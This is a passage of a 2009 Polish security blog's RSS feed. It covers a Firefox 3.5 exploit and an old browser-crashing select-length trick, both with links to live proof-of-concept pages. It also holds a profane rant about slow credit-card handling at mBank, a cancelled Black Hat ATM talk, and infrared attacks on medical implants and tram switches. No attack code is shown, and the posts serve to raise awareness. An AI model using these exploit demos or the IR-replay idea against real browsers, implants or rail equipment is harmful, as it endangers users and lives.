&lt;small&gt;PS O tym temacie pisałem już wczoraj na Blipie — właśnie dlatego warto &lt;a href=&quot;http://konieczny.blip.pl&quot;&gt;mnie tam obserwować&lt;/a&gt;... ;)&lt;/small&gt;&lt;/p&gt;
</description><pubDate>Tue, 21 Jul 2009 20:36:45 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/21/gaz-pieprzowy-w-bankomacie/</guid><category>bankomaty</category><category>funny</category><category>IT</category><category>security</category><category>atm</category><category>skimming</category><category>bankomat</category><category>gaz</category><category>karty</category></item><item><title>Exploity na Firefox 3.5.1 (i inne przeglądarki)</title><link>http://blog.konieczny.be/2009/07/19/exploity-na-firefox-3-5-i-inne-przegladarki/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7816165/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7816165_f58011f71e_o.png&quot; width=&quot;500&quot; height=&quot;200&quot; alt=&quot;FF_exploit&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Od poniedziałku, na milw0rmie dostępny jest &lt;b&gt;exploit na Firefoksa 3.5&lt;/b&gt;. Exploit pozwala na zdalne uruchomienie dowolnego kodu na komputerze ofiary. &lt;a href=&quot;http://konieczny.be/misc/exploits/FF_3.5_exploit.html&quot;&gt;Tu możecie sprawdzić jego działania&lt;/a&gt; — po kliknięciu odpali się kalkulator Windows.&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Autoexploit?&lt;/h3&gt;
&lt;p&gt;Nie pierwszy, i na pewno nie ostatni to raz, kiedy pojawia się exploit na Firefoksa — ciekawe w tym przypadku jest coś innego... Po analizie kodu exploita, jeden z developerów Firefoksa przyznał, że &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=503286#c33&quot;&gt;programiści FF najprawdopodobniej pomogli w stworzeniu exploita&lt;/a&gt;, gdyż nie ukryli na czas informacji o dziurze, dodanej do Bugzilli już w czwartek... (BTW: Napisz proszę w komentarzu do tego posta, czy powinno się ukrywać opisy błędów bezpieczeństwa?)&lt;br&gt;
&lt;br&gt;
Dopiero w piątek (po tygodniu od wykrycia błędu, i po 4 dniach od 0day'a) wypuszczona została załatana wersja Firefoksa - łatajcie się bracia i siostry!&lt;br&gt;
&lt;br&gt;
Przy okazji poprawiono błąd związany z długaśnym startem FF pod Windowsem wynikający z nie do końca przetestowanej implementacji funkcji kryptograficznych. Jak &lt;a href=&quot;https://bugzilla.mozilla.org/show_bug.cgi?id=501605#c153&quot;&gt;podaje heise&lt;/a&gt;, znalazca tego błędu twierdzi, że developerzy FF niezbyt dokładnie przetestowali build Windowsowy z racji tego, że głównie &lt;b&gt;pracują na Linuksie&lt;/b&gt;... ;)&lt;br&gt;
&lt;br&gt;
Dość o Firefoksie, bo jeszcze ktoś pomyśli, ze jest lepszy od Opery ;-P Teraz pora dać klapsa właśnie Operze ;)&lt;/p&gt;
&lt;h3&gt;Dziadek exploit&lt;/h3&gt;
&lt;p&gt;Firma G-Sec odgrzewa &lt;a href=&quot;http://www.g-sec.lu/one-bug-to-rule-them-all.html&quot;&gt;atak znany z czasów Netscape 6&lt;/a&gt;, polegający na stworzeniu menu z selectem o parametrze lenght ustawionym na kosmicznie wielką wartość. Exploit powoduje alokowanie całości dostępnej pamięci i zwis przeglądarki. Wywala Opery i IE. FF/Chrome i Safari nie są podatne na atak.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://konieczny.be/misc/exploits/select.htm&quot;&gt;Tutaj możecie go przetestować&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
Jak widać, exploity dosięgają wszystkich przeglądarek ;-) Miłego zabijania!&lt;br&gt;
&lt;br&gt;
P.S. W temacie &lt;b&gt;exploitów&lt;/b&gt; - gorąco polecam &lt;a href=&quot;http://www.kongregate.com/games/GregoryWeir/exploit&quot;&gt;tę grę&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;AKTUALIZACJA: 19.07.2009, 23:45&lt;/b&gt;&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://branch-prediction.jogger.pl/&quot;&gt;Branch Predictor&lt;/a&gt; słusznie zauważył w komentarzu, że w ledwie co zaktualizowanym Firefoksie 3.5.1 także znaleziono buga — &lt;a href=&quot;http://konieczny.be/misc/exploits/FF_3.5.1_exploit.html&quot;&gt;tutaj macie PoC&lt;/a&gt; — wywala też Operę i Safari na OS X, więc chyba tylko medialnie nazwano to &quot;nową dziurą w nowym FF&quot; ;)&lt;/p&gt;
</description><pubDate>Sun, 19 Jul 2009 23:08:13 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/19/exploity-na-firefox-3-5-i-inne-przegladarki/</guid><category>bugs</category><category>IT</category><category>przekręty</category><category>security</category><category>exploit</category><category>ff</category><category>mozilla</category><category>firefox</category><category>opera</category><category>przeglądarka</category></item><item><title>mBank &quot;TY P*ZDO&quot;!</title><link>http://blog.konieczny.be/2009/07/14/mbank-ty-pizdo/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7805156/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7805156_f79be63e0e_o.png&quot; width=&quot;500&quot; height=&quot;183&quot; alt=&quot;mBank-2&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;i&gt;Obrazek powyżej został zaciemniony na prośbę pracownika mBanku&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
Parafrazując &lt;a href=&quot;http://kominek.blox.pl/2006/01/Dr-OETKER-TY-PIZDO.html&quot;&gt;tytuł Kominka&lt;/a&gt;, mam na myśli, że mBank mnie ostatnio straszliwie wkur...ił, a użytkownicy Blipa i Twittera pomogli wyjść z opresji ...a było to tak:&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;mBank Olsztyn - 10 marca 2009, dzień pierwszy&lt;/h3&gt;
&lt;p&gt;Jestem w delegacji. Korzystając z wolnego popołudnia składam w tamtejszej placówce mBanku (&lt;i&gt;Centrum Handlowe Alfa&lt;/i&gt;) wniosek o kartę kredytową (bo z mojej obecnej karty strasznie upierdliwie korzysta się w Polsce). Po wypełnieniu wniosku, zostaję poinformowany, że jak tylko dane zostaną zweryfikowane, ktoś do mnie zadzwoni i umówi się na podpisanie umowy kredytowej... Myślę sobie, załatwione — skoczę jeszcze po colę i wracam do hotelu.&lt;br&gt;
&lt;br&gt;
Po kilkunastu minutach, już po przebyciu drogi do hotelu, w momencie wskakiwania do wygodnego łóżka, dzwoni telefon. Mój wniosek o kartę kredytową został właśnie rozpatrzony pozytywnie, a dokumenty są gotowe do podpisania. Ponieważ hotelowe łóżko wydaje się o wiele ciekawszą perspektywą od powrótu do centrum handlowego Alfa, grzecznie odpowiadam pani z mBanku, że nasze spotkanie będzie możliwe dopiero jutro ...i spokojnie zasypiam, planując na jutro wycieczkę do mBanku, zaraz przed wyjazdem z Olsztyna.&lt;br&gt;
&lt;br&gt;
Niestety, następnego dnia na własnej skórze przekonuję się ile trzeba czekać na olsztyńskiego taksówkarza (mimo że miasto jest tak wielkie, że gdyby pokryć je wykładziną dałoby radę odkurzć je &lt;b&gt;w pięćdziesiąt&lt;/b&gt; minut ;-)). Ostatnie pół godziny, które miałem przeznaczyć na wycieczkę do mBanku spędzam więc wyglądając taksówkarza i &lt;span style=&quot;display:none;&quot;&gt;zastanawianiem się, jakim &quot;dobrym słowem&quot; należy go powitać, żeby obrazić proporcjonalnie do spóźnienia, ale nie tak bardzo, by odmówił mi rejsu na dworzec PKP. Przez spóźnialskiego taksiarza,&lt;/span&gt; nie starcza już czasu na podjechanie do mBanku...&lt;/p&gt;
&lt;h3&gt;mBank Kraków - dzień drugi&lt;/h3&gt;
&lt;p&gt;Wybieram się na Karmelicką do mBanku, gdzie dowiaduję się, że krakowscy pracownicy nie mogą ściągnąć danych z wniosku złożonego w Olsztynie i niestety, &lt;b&gt;trzeba będzie wypełnić go jeszcze raz&lt;/b&gt;. Wszyscy są uprzejmi i przepraszają mnie na każdym kroku. Ponownie poświęcając kilka minut na wypełnienie potrzebnych umów, dowiaduję się, że zostaną one przesłane do placówki do Olsztyna, a po ich otrzymaniu mBank wyśle mi kartę &lt;b&gt;w ciągu tygodnia&lt;/b&gt;.&lt;/p&gt;
&lt;h3&gt;Mija pierwszy miesiąc... (mBank Kraków)&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Po przeszło miesiącu, karty dalej nie posiadam&lt;/b&gt;. Ale ciągłe otwieranie skrzynki na listy w poszukiwaniu przesyłki od mBanku ma swoje plusy — zamek przestał się zacinać... ;-)&lt;br&gt;
&lt;br&gt;
Rozumiem obsuwy, przekraczanie nieprzekraczalnych deadline'ów deadline'owych, ale tyle czasu bez żadnego telefonu &lt;i&gt;o co kaman&lt;/i&gt;!? mBank lekko przegina... Odczekuję dodatkowe 2 tygodnie (bo łagodny jestem i cierpliwy) i przystępuję do przebijania się przez durne formularze na mLinii, gdzie &lt;b&gt;składam pierwszą reklamację&lt;/b&gt;. Parę dni później dzwoni jakaś kobieta, która strasznie mnie przeprasza i tłumaczy, że &lt;b&gt;moje dokumenty się przeterminowały (sic!) i musiały zostać przeniesione do archiwum&lt;/b&gt;.&lt;/p&gt;
&lt;blockquote&gt;Jak to przeterminowały!? Jakiego k... archiwum!?&lt;/blockquote&gt;
&lt;p&gt;Według mBankierki z telefonu, podpisana przeze mnie umowa była ważna tylko przez 2 tygodnie. &lt;b&gt;WTF&lt;/b&gt;!? W ciągu tych dwóch tygodni, trafiła co prawda do centrali, ale z przyczyn od nikogo niezależnych, musiała zostać przeniesiona do tajemniczego archiwum mBanku. &lt;b&gt;WTF&lt;/b&gt;!? x 2.&lt;br&gt;
&lt;br&gt;
Podejrzewam, że &lt;b&gt;łosie zgubiły mój wniosek&lt;/b&gt; i żeby to sprawdzić, proszę o wyciągnięcie z archiwum i odesłanie mi oryginału dokumentów. Prośbę motywuję tym, że umowa zawiera moje dane osobowe i inne wrażliwe informacje i nie została zrealizowana, ba! mBank twierdzi nawet, że jest przeterminowana. Tym wybijam panią ze &quot;skryptu&quot;, który miała na ekranie monitora, z czego jestem dumny, ale po chwili zaczynam żałować, bo pani przechodzi w tryb automatu, który na każde moje pytanie odpowiada tylko to: &quot;&lt;b&gt;procedury nie pozwalają na wyjęcie dokumentów z archiwum, ale proszę być pewnym, że pańskie dane sa u nas bezpieczne&lt;/b&gt;&quot;. Bezpieczne my ass!&lt;/p&gt;
&lt;blockquote&gt;No cóż, myślę sobie, pozostało mi chyba jedynie życzyć jakichś krwistych hemoroidów komuś z mBanku... komuś, kto zapewne zastanawiając się jakby tu wydymać kolejnych klientów na opcjach walutowych, przysłonił sobie na dwa tygodnie moją umowę najnowszym wydaniem książki pt. &quot;ABC zajebistego bankiera. Część II - jak profesjonalnie oszukać klienta&quot;.&lt;/blockquote&gt;
&lt;p&gt;Po chwili mBankierka wyskakuje z pętli i obiecuje, że załatwi, żeby wszystko było już dla mnie bardzo przyjemne, że skontakuje się ze mną jakiś pracownik krakowskiego mBanku i umówi na ekspresowe ponowne-ponowne wypełnienie dokumentów.&lt;br&gt;
&lt;br&gt;
I faktycznie, wieczorem dzwoni jakiś osobnik, który jąkając się i dukając w tempie wolniejszym od najwolniejszej osobówki PKP &quot;pędzącej&quot; po centralnej magistrali kolejowej, stara się niedołężnie wytłumaczyć i przeprosić za całą sprawę. I tu sam pod sobą dołek wykopał, bo z każdym jego słowem, przypominałem sobie to, przez co przeszedłem w ostatnim miesiącu, a podczas tego mojego przypominania, złość we mnie narastała, a krew zalewała. Wierzcie mi, że próbowałem z nim &lt;b&gt;wypełnić ten cholerny wniosek po raz trzeci&lt;/b&gt;... ale ponieważ facet ze zdania na zdanie doskonalił swoje techniki jąkodukania, a mnie przestały bawić nagminne prośby o powtórzenie ostatniego słowa, zaproponowałem spotkanie.&lt;/p&gt;
&lt;h3&gt;Miesiąc i dwa tygodnie później. (wciąż mBank Kraków)&lt;/h3&gt;
&lt;p&gt;Na wyznaczoną godzinę przybywam do krakowskiego mBanku. Po 10 min. stania w kolejce i przyglądania się jak jedyny obecny na miejscu pracownik mBanku stara się zademonstrować jakiejś kobiecie &lt;b&gt;jak korzysta się z bankomatu&lt;/b&gt;, wiem już, że najprawdopodobniej absurd szybko nie zniknie z powietrza i raczej niczego dziś nie załatwię.&lt;br&gt;
&lt;br&gt;
Moje prorocze wizje sprawdzają się już po paru minutach, kiedy to okazuje się, że &quot;powolniaka&quot; z którym się umówiłem nie ma, ale postarają sie znaleźć kogoś, kto się mną zajmie... i faktycznie po &lt;b&gt;20&lt;/b&gt; (sic!) minutach, pojawia się ktoś z umową i szczęśliwie oznajmia mi, że &lt;b&gt;wystarczy tu podpisać i to wszystko&lt;/b&gt;. Na jego nieszczęście, na pierwszej stronie w oczy kłuje mnie niepoprawny adres zameldowania (skąd oni go wzięli?!). Wskazuję błąd, a mBankierowi uśmiech z twarzy spada. Znika więc poprawić i wydrukować umowę jeszcze raz...&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Po kolejnych 20 minutach&lt;/b&gt;, w których to tysiąc razy zdążyłem przeanalizować z jaką prędkością kątową należałoby obracać rolki w drukarce, żeby przypadkiem nie zadrukować więcej niż dwie strony papieru w 20 min, pracownik mBanku pojawia się z powrotem. Składam podpisy i przeżywam &lt;i&gt;deja vu&lt;/i&gt; - &quot;&lt;b&gt;To wszystko, karta za tydzień powinna być w Pana skrzynce na listy&lt;/b&gt;&quot;.&lt;/p&gt;
&lt;h3&gt;Mija kolejny miesiąc (dalej mBank Kraków)&lt;/h3&gt;
&lt;p&gt;Jest 23 czerwca. &lt;b&gt;Prawie cztery (sic!) miesiące od mojego pierwszego kontaktu z mBankiem w sprawie karty&lt;/b&gt;. Odbieram telefon od mojego ulubionego &quot;powolniaka&quot; z mBanku, który znów zaczyna od pooooowooolneeeegooo przypomnienia mi całej mojej traumatycznej historii kontaktów z mBankiem (czyżby mieli szkolenia z technik anty-NLP?). Po jego ślimaczym głosie już wiem, że coś znów poszło nie tak, ale nie spodziewam się, że pajac będzie na tyle bezczelny, żeby powiedzieć mi co następuje: &quot;&lt;i&gt;Popełniliśmy błąd, w Pana wniosku znalazł się inny adres zameldowania, niż ten który Pan posiada. &lt;b&gt;Sugeruję zalogować się do mBanku i zmienić w ustawieniach konta adres zameldowania na ten, który Panu podyktuję&lt;/b&gt;&lt;/i&gt;&quot;.&lt;/p&gt;
&lt;blockquote&gt;Tu dostaję autentycznej kur...cy!&lt;/blockquote&gt;
&lt;p&gt;Czuję, że właśnie pobiłem rekord Księgi Guinessa, bo chyba nie ma drugiej istoty we wszechświecie, która spotkała się z &lt;b&gt;taką ilością absurdu&lt;/b&gt; przy wydawaniu kawałka pieprzonego plastiku. Pohamowując wulgaryzmy, grzecznie acz stanowczo opierdzielam faceta, dobierając tak kwieciste epitety, że na dobre 5 min. mojego koncertu, składającego się z naprzemiennego wyliczania niekompetencji mBanku w ostatnich 4 miesiącach i porównywania inteligencji pracowników mBanku do peruki Michaela Jacksona, wszyscy w firmie rzucają robotę i zaczynają się przysłuchiwać mojej rozmowie.&lt;br&gt;
&lt;br&gt;
Chwilę później spędzam 30 min na mLinii, skłądając &lt;b&gt;drugą reklamację&lt;/b&gt; na skandaliczne zachowanie pracowników mBanku oraz dając mBankowi ultimatum, że jeśli nie skontaktuje się ze mną jakaś normalna osoba i nie złoży mi jakiejś satysfakcjonującej propozycji, to nie tylko napiszę do Komisji Nadzoru Finansowego, ale również złożę skargę do UOKiK i GIODO w sprawie zagninionych dokumentów zawierających moje dane osobowe i inne wrażliwe informacje. Reklamacja zostaje przyjęta (ale nie bez problemów, w trakcie jej spisywania, &lt;b&gt;operatorowi mLinii zrestartował się komputer&lt;/b&gt; — gorąco polecam dźwięk startu Windowsa w trakcie stanu poddenerwowania, możecie sobie wyobrazić jak złagodził mi nastrój...).&lt;/p&gt;
&lt;h3&gt;Dzień później. (mBank Kraków)&lt;/h3&gt;
&lt;p&gt;Dostaję telefon od pracownika mBanku, który informuje mnie, że rozpatruje moją reklamację... &lt;b&gt;I teraz najlepsze&lt;/b&gt;:&lt;/p&gt;
&lt;blockquote&gt;Jak się okazuje, reklamację rozpatruje ten sam człowiek, na którego złożyłem skargę za namawianie mnie do zmiany adresu!&lt;/blockquote&gt;
&lt;p&gt;Zastanawiam się, &lt;b&gt;czy można jeszcze bardziej przekroczyć granice absurdu&lt;/b&gt; i resztką sił oznajmiam, że nie traktuję telefonu od niego jako jakiejkolwiek próby rozpatrzenia reklamacji i nie mamy o czym rozmawiać. Chwilę potem, zrezygnowany pytam &lt;a href=&quot;http://blip.pl/s/11898246&quot;&gt;na Blipie&lt;/a&gt;, czy &lt;b&gt;ktokolwiek zna jakiegokolwiek pracownika mBanku, który posiada IQ większe od proszku do prania?&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Tego samego dnia. Internet - Blip &amp;amp; Twitter&lt;/h3&gt;
&lt;p&gt;Odzywają się 2 osoby pracujące w polskim mBanku (Rafał B. i Ania P.) oraz Adam z czeskiego mBanku, który jak się okazuje prowadzi &lt;b&gt;monitoring Twittera&lt;/b&gt;, a na mój wpis trafił po tagu mBank. Wszystkie trzy osoby obiecują zająć się sprawą i już następnego dnia dostaję telefon z mBanku od Tomasza K., który jako jedyny pracownik tego banku w ciągu ostatnich 4 miesięcy, był w stanie wyjaśnić mi co się dzieje z moją kartą i kiedy ją otrzymam.&lt;br&gt;
&lt;br&gt;
W ramach rekompensaty dostaję zwrot opłaty za kartę (kilkadziesiąt złotych), co nie starczy zapewne nawet na pokrycie rachunków telefonicznych na mLinię, nie mówiąc już o dwa rzędy wyższych szkodach spowodowanych zmarnotrawieniem mojego czasu i tłamszeniem mojej psychiki... &lt;b&gt;Tylko na tyle Cię stać, mBanku, który obniżasz oprocentowanie moich lokat regularnie z kwartału na kwartał?&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Podsumowanie&lt;/h3&gt;
&lt;p&gt;Załatwienie karty kredytowej w mBanku zajęło mi 4 długie miesiące. Od dziś mBank rozwijam więc jako &lt;b&gt;mogłeś_wybrać_lepszy_Bank&lt;/b&gt;. No cóż, pozostaje mi znaleźć inny bank, i podziękować blipowiczo-twitterowiczom za błyskawiczne i skuteczne działania, które zakończyły moje cierpienia. &lt;b&gt;Mam nadzieję, że aby kolejny raz załatwić coś w mBanku, nie będę musiał porównywać na Blipie/Twitterze inteligencji jego pracowników do proszku do prania&lt;/b&gt;...&lt;/p&gt;
&lt;blockquote&gt;Jeśli macie swoje mBankowe hejtstory, piszcie w komentarzach, niech się ludzie dowiedzą!&lt;/blockquote&gt;
&lt;p&gt;P.S. Okazuje się, że &lt;a href=&quot;http://www.blog.shrew.pl/2009/06/30/mbank-daje-hasla-ktore-nie-dzialaja/&quot;&gt;nie tylko ja&lt;/a&gt; natknąłem mBankowe absurdy...&lt;br&gt;
&lt;br&gt;
P.P.S A kartę dostałem w ostatni piątek. Jest tak kiepskiej jakości, że farba już zdążyła się przetrzeć w kilku miejscach... Ale działa. Jeszcze :&amp;gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;AKTUALIZACJA [10:33, 20.07.2009]&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Na podstawie powyższego posta (i kilku innych wydarzeń), Gazeta Wyborcza publikuje &lt;a href=&quot;http://gospodarka.gazeta.pl/gospodarka/1,33181,6838218,firmamnieskrzywdzila_com.html&quot;&gt;artykuł o &quot;przyśpieszaniu&quot; reklamacji&lt;/a&gt; poprzez narzekania użytkowników w Internecie.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;AKTUALIZACJA [15:56, 24.07.2009]&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;W trakcie pisania postu, zapomniałem o jeszcze jednym świetnym e-mailu, który przyszedł do mnie z mBanku w odpowiedzi na reklamację:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7850262/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7850262_f2416db166.jpg&quot; width=&quot;500&quot; height=&quot;252&quot; alt=&quot;mBank_reklamacja&quot;&gt;&lt;/a&gt;&lt;/p&gt;
</description><pubDate>Tue, 14 Jul 2009 21:41:40 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/14/mbank-ty-pizdo/</guid><category>funny</category><category>IT</category><category>Kraków</category><category>przekręty</category><category>mbank</category><category>karta kredytowa</category><category>cc</category><category>karta</category><category>kredytowa</category><category>kredyt</category></item><item><title>Tekturowe karty kredytowe...</title><link>http://blog.konieczny.be/2009/07/11/tekturowe-karty-kredytowe/</link><description>&lt;p&gt;Dziś, niesamowicie ubawił mnie pewien artykuł:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7775902/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7775902_e1573a4e59.jpg&quot; width=&quot;500&quot; height=&quot;428&quot; alt=&quot;Skimming po Polsku&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
P.S. Przypominam, że podobne śmiesznostki związane nie tylko z bezpieczeństwem sieci, zbieram i udostępniam pod nazwą &lt;a href=&quot;http://konieczny.be/geekfun/&quot;&gt;geekfun&lt;/a&gt; — miłego przeglądania!&lt;/p&gt;
</description><pubDate>Sat, 11 Jul 2009 11:12:27 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/11/tekturowe-karty-kredytowe/</guid><category>bankomaty</category><category>funny</category><category>IT</category><category>przekręty</category><category>security</category><category>skimming</category><category>vhs</category><category>karton</category><category>bankomat</category><category>policja</category></item><item><title>Prezentacja o hackowaniu bankomatów odwołana</title><link>http://blog.konieczny.be/2009/07/09/prezentacja-o-hackowaniu-bankomatow-odwolana/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7773172/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7773172_5397ae0ea8_o.png&quot; width=&quot;500&quot; height=&quot;190&quot; alt=&quot;ATM Hacking&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Nie, nie chodzi o &lt;a href=&quot;http://blog.konieczny.be/2009/06/01/atakowanie-bankomatow-prezentacja-w-pdf/&quot;&gt;moją&lt;/a&gt; ;-) Na początku lipca, pod naciskiem producentów bankomatów, firma Juniper zabroniła swojemu pracownikowi pokazania na konferencji BlackHat zapowiedzianej wcześniej prezentacji dotyczącej błędów w bankomatach.&lt;br&gt;
&lt;br&gt;
Wykład Jack'a Barnaby miał zaprezentować zarówno lokalne jak i zdalne ataki na bankomaty różnych producentów. Tak szerokie potraktowanie tematu przez Barnabę może wskazywać na lukę nie w sprzęcie, a w oprogramowaniu firmy Diebold, powszechnie wykorzystywanym przez większośc producentów bankomatów.&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Historia lubi się powtarzać&lt;/h3&gt;
&lt;p&gt;Historia zna już przypadek, kiedy to błąd w oprogramowaniu firmy Diebold pozwolił na &lt;a href=&quot;http://blog.konieczny.be/2009/06/04/trojan-w-bankomacie/&quot;&gt;kradzież danych z bankomatu&lt;/a&gt; i manipulacje przy kasetkach z pieniędzmi.&lt;br&gt;
&lt;br&gt;
Historia zna równiez przypadek, kiedy to prezentacje na BlackHacie były wycofywane ze względu na naciski firm, do których należało omawiane (dziurawe) oprogramowanie. W 2008, Apple zabroniło wygłoszenia wykładu o lukach w FileVault, a w 2007 &lt;a href=&quot;http://philips.co.uk&quot;&gt;mój były pracodawca&lt;/a&gt; naciskał na zdjęcie z agendy prezentacji o błędach w chipach RFID...&lt;br&gt;
&lt;br&gt;
Najciekawszy przypadek, to jednak Mike Lynn, który w 2005 został pozbawiony przez Cisco (a także własnych przełożonych, od których wcześniej otrzymał zgodę) możliwości opowiedzenia o poważnej luce w systemie IOS. Mike dał jednak prezentację, &lt;b&gt;zwalniając się z pracy&lt;/b&gt; na chwilę przed wykładem... Po wykładzie zapytał, czy ktoś nie chciałby go zatrudnić i dostał wtedy ofertę od firmy ...Juniper -- czyli tej samej, która teraz odwołuje prezentację swojego innego pracownika... (o ironio!)&lt;br&gt;
&lt;br&gt;
P.S. Wygląda na to, że w Polsce wolność słowa jest bardziej szanowana - swoją prezentację o atakach na bankomaty wygłosiłem już w 4 różnych miejscach... ;-)&lt;/p&gt;
</description><pubDate>Thu, 09 Jul 2009 20:52:37 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/09/prezentacja-o-hackowaniu-bankomatow-odwolana/</guid><category>bankomaty</category><category>IT</category><category>przekręty</category><category>security</category><category>bankomat</category><category>atm</category><category>hacking</category><category>blackhat</category><category>juniper</category></item><item><title>2 firewalle proszę, jeden na mózg, drugi na serce</title><link>http://blog.konieczny.be/2009/07/08/2-firewalle-prosze-jeden-na-mozg-drugi-na-serce/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7771057/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7771057_4c5814e858_o.png&quot; width=&quot;500&quot; height=&quot;216&quot; alt=&quot;Hacking medical implants&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Nie jest tajemnicą, że najnowsza technologia przyśpiesza i usprawnia prawie każdy przemysł, także medyczny... Lekarze wszczepiają pacjentom różnego rodzaju implanty, począwszy od tych &quot;&lt;i&gt;pasywnych&lt;/i&gt;&quot;, których zadaniem jest tylko monitorować stan zdrowia pacjenta, aż po implanty &quot;&lt;i&gt;aktywne&lt;/i&gt;&quot; — dawkujące leki lub pobudzające niektóre funkcje narządów wewnętrznych człowieka.&lt;br&gt;
&lt;br&gt;
Implanty, jak to urządzenia elektromechaniczne, od czasu do czasu potrzebują zgrania zebranych danych lub drobnego przeprogramowania (rzadziej doładowania). Najczęściej &lt;b&gt;do komunikacji z implantem wykorzystuje się podczerwień&lt;/b&gt;... i właśnie tu pojawia się pewien problem.&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Jak zalogować się na implant?&lt;/h3&gt;
&lt;p&gt;Otóż, wcale logować się nie trzeba... Implanty nie zostały bowiem wyposażone w żadne mechanizmy uwierzytelniania. Dlatego przeprogramować może je &lt;b&gt;każdy&lt;/b&gt;, a nie tylko opiekujący się pacjentem &lt;del&gt;programista&lt;/del&gt; lekarz ;-)&lt;br&gt;
&lt;br&gt;
Sytuacja jest podobna do wspominanych na moim &lt;a href=&quot;http://blog.konieczny.be/2009/06/01/atakowanie-bankomatow-prezentacja-w-pdf/&quot;&gt;wykładzie&lt;/a&gt; czytników kodów kreskowych — aby przeprogramować implant, należy poznać odpowiedni ciąg kodów, który wyślemy podczerwienią, a który zdobędziemy z ...&lt;b&gt;ogólnodostępnej&lt;/b&gt; instrukcji obsługi implantu.&lt;br&gt;
&lt;br&gt;
Pewnie wydaje ci się teraz, że &quot;ataki na implant&quot; to odległa przyszłość? Że potrzeba nie lada wiedzy i w ogóle, kto by się odważył poigrać z życiem drugiego człowieka? No to mam dla ciebie analogiczną historię, zamieńmy tylko radiowo sterowany implant na zwrotnicę tramwajową, a człowieka na wagon pełny ludzi:&lt;/p&gt;
&lt;blockquote&gt;Łódź. Policjanci zatrzymali w środę 14-latka (...) W miejscu jego zamieszkania zabezpieczyli urządzenie, którego wygląd i konstrukcja wskazywały na promiennik podczerwieni sterujący położeniem zwrotnic tramwajowych. Chłopak został oskarżony o przełączenie zwrotnicy podczas przejazdu tramwaju, co spowodowało wykolejenie się jednego z wagonów. Oskarżony przyznał się do winy.&lt;/blockquote&gt;
&lt;p&gt;Jak widać, nie tylko implanty podatne są na ataki — tramwajowe zwrotnice też nie posiadają żadnych mechanizmów uwierzytelniania i znów wystarczy odpowiedni kod wysłany poprzez podczerwień, by trochę namieszać. Trzeba dodać,&amp;nbsp;że kod sterujący pracą zwrotnicy za każdym razem jest taki sam i bardzo łatwo można go &quot;podsłuchać&quot;...&lt;/p&gt;
&lt;h3&gt;Testy penetracyjne zwrotnic i implantów?&lt;/h3&gt;
&lt;p&gt;Implanty medyczne to modelowy wręcz przykład na to, jak istotnym jest, aby nowe technologie wdrażane poza świadomym &quot;hackerów&quot; rynkiem IT były projektowane z myślą o bezpieczeństwie i poddawane okresowym testom penetracyjnym...&lt;br&gt;
&lt;br&gt;
W przeciwnym razie, doczekamy się pewnie produktów takich jak &lt;b&gt;firewalle dla narządów wewnętrznych&lt;/b&gt; lub &lt;b&gt;personalne klatki Faraday'a&lt;/b&gt;... chociaż obawiam się, że oba wynalazki moga mieć trudności w uchronieniu nas przed skutkami przestawienia zwrotnicy tramwajowej...&lt;br&gt;
&lt;br&gt;
P.S. Zastanawiam się, ile czasu upłynie, zanim na rynku pojawią się pierwsze piloty do TV z przyciskami podpisanymi &quot;&lt;b&gt;przypraw o atak serca&lt;/b&gt;&quot;...?&lt;/p&gt;
